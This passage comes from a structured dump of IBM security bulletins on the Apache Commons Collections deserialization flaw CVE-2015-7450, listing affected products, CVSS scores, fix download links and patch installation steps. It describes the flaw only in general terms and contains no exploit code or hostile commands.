[_Rational-RSA4WS90-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+for+WebSphere+Software&release=9.0.0&platform=All&function=fixId&fixids=Rational-RSA4WS90-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect for WebSphere Software (RSA4WS)| 8.5.x| [_Rational-RSA4WS85-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+for+WebSphere+Software&release=8.5.0&platform=All&function=fixId&fixids=Rational-RSA4WS85-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect RealTime (RSART)| 9.5| [_Rational-RSART95-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+RealTime+Edition&release=9.5.0&platform=All&function=fixId&fixids=Rational-RSART95-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect RealTime (RSART)| 9.1.x| [_Rational-RSART91-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+RealTime+Edition&release=9.1.0&platform=All&function=fixId&fixids=Rational-RSART91-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect RealTime (RSART)| 9.0.x| [_Rational-RSART90-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+RealTime+Edition&release=9.0.0&platform=All&function=fixId&fixids=Rational-RSART90-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect RealTime (RSART)| 8.5.x| [_Rational-RSART85-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+RealTime+Edition&release=8.5.0&platform=All&function=fixId&fixids=Rational-RSART85-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \n \n \n**Installation Instructions** **For versions 8.5.x** \n--- \n**Instructions to download and install the update from the compressed files**\n\n1\\. Download the update files from Fix Central by following the link listed in the above table 2\\. Extract the compressed files in an appropriate directory. For example, choose to extract to `C:\\temp\\update` \n3\\. Now, follow the mapping instructions in the table below to pick the folder for the version of your installed product | Product Version| Mapping folder \n---|--- \n8.5| 8.5 \n8.5.1| 8.5.1 \n8.5.5| 8.5.5 \n8.5.5.1 to 8.5.5.3| 8.5.5.1 \n8.5.5.4| 8.5.5.2 \n4\\. Copy the contents of the <extraction location>/features/ directory to <product install directory>/features/ for your version of the product 5\\. Copy the contents of the <extraction location>/plugins/ directory to <product install directory>/plugins/ for your version of the product \n6\\. Restart your version of the product \n**For versions 9.0.x, 9.1.x, and 9.5.x instructions on installing this update using Installation Manager, review the topic **[**_Updating Installed Product Packages_**](<http://www-01.ibm.com/support/knowledgecenter/SS8PJ7_9.5.0/com.ibm.xtools.installation.rsaws.doc/topics/t_update.html>)** in the IBM Knowledge Center.** \n--- \n**Important:** By default, you do not need to download the compressed files that contain the update; the update is downloaded and installed by IBM Installation Manager directly from the IBM update repository. \n\n**Instructions to download and install the update from the compressed files**\n\n1\\. Download the update files from Fix Central by following the link listed in the above table 2\\. Extract the compressed files in an appropriate directory. For example, choose to extract to `C:\\temp\\update` 3\\. Add the update's repository location in IBM Installation Manager: 1\\. Start IBM Installation Manager. \n2\\. On the Start page of Installation Manager, click **File** > **Preferences**, and then click **Repositories**. The Repositories page opens. \n3\\. On the Repositories page, click **Add Repository**. \n4\\. In the Add repository window, browse to or enter the file path to the repository.config file, which is located in the directory where you extracted the compressed files and then click **OK**. For example, enter `C:\\temp\\updates\\repository.config`. \n5\\. Click **OK** to close the Preference page. 4\\. Install the update as described in the the topic \"Updating Installed Product Packages\" in the information center for your product and version \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-10T15:49:00", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect RealTime (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-09-10T15:49:00", "id": "65DB2DF1E5DFCD77CCBBB618503600B226ECB723619232D76182A80D58890F9D", "href": "https://www.ibm.com/support/pages/node/274315", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:49:56", "description": "## Summary\n\nThe Java serialization attack on Apache Commons Collections (CVE-2015-7450) affects the configuration of IBM WebSphere Application Server Liberty Profile shipped as an embedded component of IBM i2 Intelligence Analysis Platform / IBM i2 Analyze.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>).\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM i2 Intelligence Analysis Platform 3.0.11| WebSphere Liberty 8.5.5.5 \nIBM i2 Analyze 4.0.0| WebSphere Liberty 8.5.5.6 \n \n## Remediation/Fixes\n\nApply the fix described in the Security Bulletin above.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:56:56", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Liberty bundled with IBM i2 Analyze. (CVE 2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:56:56", "id": "D807F98F285E9AA24C6982ECD7ECE986CC9DAEE3771B85EB11104E7DB3A38BAE", "href": "https://www.ibm.com/support/pages/node/273167", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:44", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n\n[IBM Social Media Analytics 1.3.0 IF17](<http://www-01.ibm.com/support/docview.wss?uid=swg24041836>)\n\nFor users of IBM Social Media Analytics 1.2 IBM recommends upgrading to IBM Social Media Analytics 1.3.\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone known. Apply fixes.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T22:44:20", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Social Media Analytics (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T22:44:20", "id": "4429AE393D14D9DD1BA1A49D42CB67BB5D731909307AF189B937C047DFFB1943", "href": "https://www.ibm.com/support/pages/node/544297", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:46", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Algo Credit Administrator\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Algo Credit Administrator 2.2.0\n\n## Remediation/Fixes\n\nA fix has been created for version 2.2.0 of the named product. Download and install the fix as soon as practicable. Fix and installation instructions are provided at the URL listed below. \n \n\n\nPatch Number| Download URL \n---|--- \nAlgo Credit Administrator 2.2.0-116| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=2.2.0.0-Algo-ACA-gf0116:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=2.2.0.0-Algo-ACA-gf0116:0&includeSupersedes=0&source=fc&login=true>) \n \nFor versions prior to 2.2.0 IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T22:41:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Algo Credit Administrator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T22:41:02", "id": "5E2AFDF7AB3E087F15E11D8D08AEEF34592E638BA469F3697192CBD365B9C998", "href": "https://www.ibm.com/support/pages/node/272173", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:51:29", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Forms Server.\n\n## Vulnerability Details\n\nCVEID: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See[ https://exchange.xforce.ibmcloud.com/vulnerabilities/107918](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>)[](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Forms Server 4.0.* \nIBM Forms Server 8.0.* \nIBM Forms Server 8.1 \nIBM Forms Server 8.2\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation** \n---|---|---|--- \nIBM Forms Server| 4.0.0.*| LO87133 | \n\nDownload and install [](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.2.0-FormsServer-WFS-IF0001&includeRequisites=1>)[4.0.0.2-FormsServer-WFS-IF0002](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=4.0.0.2-FormsServer-WFS-IF0002&includeRequisites=1>) \n \nIBM Forms Server| 8.0.0.*| LO87133| \n\nDownload and install [8.0.0-FormsServer-WFS-IF0002](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.0.0-FormsServer-WFS-IF0002&includeRequisites=1>) \n \nIBM Forms Server| 8.0.1.*| LO87133 \nIBM Forms Server| 8.1.*| LO87133| \n\nDownload and install [8.1.0-FormsServer-WFS-IF0002](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.1.0-FormsServer-WFS-IF0002&includeRequisites=1>) \n \nIBM Forms Server| 8.2.*| LO87133| \n\nDownload and install [8.2.0-FormsServer-WFS-IF0001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Lotus/Forms+Server&function=fixId&fixids=8.2.0-FormsServer-WFS-IF0001&includeRequisites=1>) \n \n \n**Note:** Before installing this update, you must first install the [WebSphere Application Server fix for APAR PI50993](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/WebSphere+Application+Server&release=All&function=aparId&apars=PI50993>). Installing this update without the fix for WAS will cause IBM Forms Server to fail. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:52:47", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons Collections affects IBM Forms Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T19:52:47", "id": "E9094C448DDFA53F1801F49370E9B1301873155775CFD8E4A6A53500E27FBB43", "href": "https://www.ibm.com/support/pages/node/272617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:26", "description": "## Summary\n\nThe Knowledge Center Component used in Version 9 of the WebSphere Application Server needs an updated Apache Commons Collections library. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n** DESCRIPTION: **Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affect the following versions and releases of WebSphere Application Server and bundling products.\n\n * 9.0\n \n\n\n## Remediation/Fixes\n\nTo patch an existing service instance, refer to the IBM WebSphere Application Server bulletin listed below \n\n * [Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105> \"Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable \$CVE-2015-7450\$\" )\n\nPlease see [ Updating your environment](<https://cloud.ibm.com/docs/services/ApplicationServeronCloud?topic=wasaas-updating-your-environment>) in the KnowlegeCenter for information on applying service. \n\nAlternatively, delete the vulnerable service instance and create a new instance.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable in IBM Cloud (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "E0D7548645A05D9144D632068CCC3B58C8A5E23E2D109EE95E87CEFA7A738D34", "href": "https://www.ibm.com/support/pages/node/1128543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:50:45", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM System Networking Switch Center.\n\n## Vulnerability Details\n\n## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM System Networking Switch Center.\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>)\n\n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <http://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAll versions of IBM System Networking Switch Center prior to 7.3.2.0.\n\n## Remediation/Fixes:\n\nIBM System Networking Switch Center 7.3.2.0.\n\nThe install package can be found on IBM's Passport Advantage website:\n\n<http://www-01.ibm.com/software/passportadvantage/>\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations:\n\nNone.\n\n## References:\n\n * [Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide.html>)\n * [On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/psirt/>) \n\n\n**Acknowledgement**\n\nNone.\n\n**Change History** \n22 February 2016: Original version published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-31T02:25:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM System Networking Switch Center (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-01-31T02:25:02", "id": "092255B27E9CC9D8C8B4052573A37868D7EA0A5694D3432A777F3FB2BA34195C", "href": "https://www.ibm.com/support/pages/node/868452", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:08", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational ClearQuest. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (__CVE-2015-7450__)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n * ClearQuest Web 8.0 and above. \n\n## Remediation/Fixes\n\nFollow instructions for updating your version of WebSphere Application Server to a version that includes the fixes. \n \nClearQuest uses an installation of WAS separately installed and maintained from the ClearQuest installation. Determine the version of WAS that your deployment is using and follow the instructions at [](<http://www.ibm.com/support/docview.wss?uid=swg21883573>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg21964428>)[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) to update your version of WebSphere Application Server. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-29T18:04:03", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearQuest (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-09-29T18:04:03", "id": "19926537DC891C5AD7A729E9A8684B4D6D6593A474667DC8BF2B3DA57D44FCF9", "href": "https://www.ibm.com/support/pages/node/272077", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:56", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Tivoli Network Manager Transmission Edition.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nTivoli Network Manager Transmission Edition 5.6\n\n## Remediation/Fixes\n\nThe affected file is the $NCHOME/precisiontn/platform/java/lib/3rdparty/commons-collections.jar. \n\n[netcool@itnmte 3rdparty]$ pwd\n\n/opt/netcool/precisiontn/platform/java/lib/3rdparty\n\n[netcool@itnmte 3rdparty]$ cksum commons-collections.jar\n\n1639223439 518641 commons-collections.jar\n\nIt should be noted that the Tivoli Network Manager Transmission Edition also installs other copies of the Apache Commons Collections library, but these files are not affected by this vulnerability.\n\nThe following instructions explain how to replace the affected commons-collections.jar:\n\n**Instructions**\n\n1\\. Download the commons-collections.jar below:\n\n![commons-collections.jar](/support/pages/system/files/support/swg/tivtech.nsf/0/559d324aa5ea96e685257f08004167bf/RemediationFixes/0.3CC.gif)commons-collections.jar\n\n2\\. Stop the nmtn_server process.\n\n3\\. Delete or move $NCHOME/precisiontn/platform/java/lib/3rdparty/commons-collections.jar to a different directory.\n\n4\\. Copy the download commons-collections.jar to $NCHOME/precisiontn/platform/java/lib/3rdparty/\n\n5\\. Restart the nmtn_server process.\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 